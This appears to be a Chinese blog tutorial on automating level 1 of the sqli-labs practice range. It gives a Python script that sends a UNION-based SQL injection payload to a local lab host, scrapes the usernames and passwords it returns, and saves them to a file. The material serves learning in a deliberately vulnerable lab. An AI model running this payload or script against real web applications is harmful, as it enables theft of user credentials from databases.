sqli-labs靶场自动化利用工具——第1关

文章目录

概要

Sqli-Labs靶场对于网安专业的学生或正在学习网安的朋友来说并不陌生,或者说已经很熟悉。那有没有朋友想过自己开发一个测试脚本能实现自动化化测试sqli-labs呢?可能有些人会说不是有sqlmap,那我们又何须使用这个小脚本呢?这里我统一回答,sqlmap只是一个工具,工具始终是不能代替人的思考。开发这个测试的脚本他都是有针对性的,他是针对每一关的精心设计。但凡脱离实际都是在空想。我也是一直围绕这个主题,所以想到了开发能自动化测试sqli-labs靶场每一关的POC。最后这个只能用于有基础的网安人进行学习,学习网安路还是不能投机取巧的。

本章适合人群:

  1. 网安专业学生
  2. 报班学习网安内容的同学
  3. 提高写POC能力的网安从业者

整体架构流程

因为是sqli-labs的第一关,且我觉得名字很是麻烦,所以我在写脚本的时候错将sqli-labs写成了sql-libs请见谅。如果你有强迫症可以自行修改。

整体流程主要是仿爬虫的形式访问网页,之后将得到的数据记录在和py文件同一级的目录下面。

技术细节

python 复制代码
import re
import requests
import os
print("当前工作目录:", os.getcwd())


def send_request(url):
    headers = {
        'Host': 'sql:8081',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
        'Priority': 'u=0, i'
    }
    params = {
        'id': "-1' union select 1,2,group_concat(username,0x3a,password) from users-- -"
    }
    try:
        response = requests.get(url + "/Less-1/", headers=headers, params=params, verify=False)
        if response.status_code == 200:
            print(f'{url} 存在漏洞.')
            html_content = response.text
            pattern = r'Your Password:(.*?)</font>'
            credentials = re.findall(pattern, html_content, re.DOTALL)
            if credentials:
                pairs = credentials[0].split(',')
                file_path = os.path.join(os.getcwd(), 'credentials.txt')
                with open(file_path, 'w') as f:
                    for pair in pairs:
                        username, password = pair.split(':')
                        # 写入用户名和密码到文件
                        f.write(f'Username: {username.strip()}, Password: {password.strip()}\n')
            print('Credentials have been extracted and saved to credentials.txt.')
        else:
            print(f'{url} no.')
    except requests.RequestException as e:
        print(f'Error scanning {url}: {e}')


send_request('http://sql:8081')

执行效果

小结

由于我的sqli-labs靶场是搭建在我的本机,所以使用代码时需要进行修改。

且想输出不一样的文件内容格式,也可以进行微调整。

最后还是那句话网安的路上不会一帆风顺,还需脚踏实地一步一个脚印的前行,仅用于POC的学习使用,其他使用与作者无关。

相关推荐
REDcker7 分钟前
Playwright详解 Web自动化与E2E测试 架构原理与实战入门
前端·架构·自动化
用户6757049885028 分钟前
再见 pip!Rust 写的 uv 正在把 Python 包管理按在地上摩擦
后端·python
川石课堂软件测试13 分钟前
接口测试常见面试题及答案
python·网络协议·mysql·华为·单元测试·prometheus·harmonyos
竹叶青lvye14 分钟前
Python订阅与发布功能简介
python·订阅与发布
用户67570498850217 分钟前
Python 装饰器很难?那是你没看到这篇文章!
后端·python
X7x522 分钟前
网络入侵防御系统(IPS):从被动防御到主动拦截的网络安全革命
网络安全·网络攻击模型·安全威胁分析·安全架构·ips
Soari27 分钟前
AI 编码智能体的“安全防弹衣”:深度拆解 agent-skills,构建百分百受信任的专业技能注册表
人工智能·网络安全·github·软件工程·aiagent·claudecode·agent-skills
码界筑梦坊31 分钟前
124-基于Python的航空旅客满意度数据可视化分析系统
开发语言·python·信息可视化·数据分析·flask·毕业设计
LT101579744434 分钟前
2026年智能RPA选型指南:全场景智能自动化适配
运维·自动化·rpa
星越华夏36 分钟前
PPTX判断包含图表id
python·pandas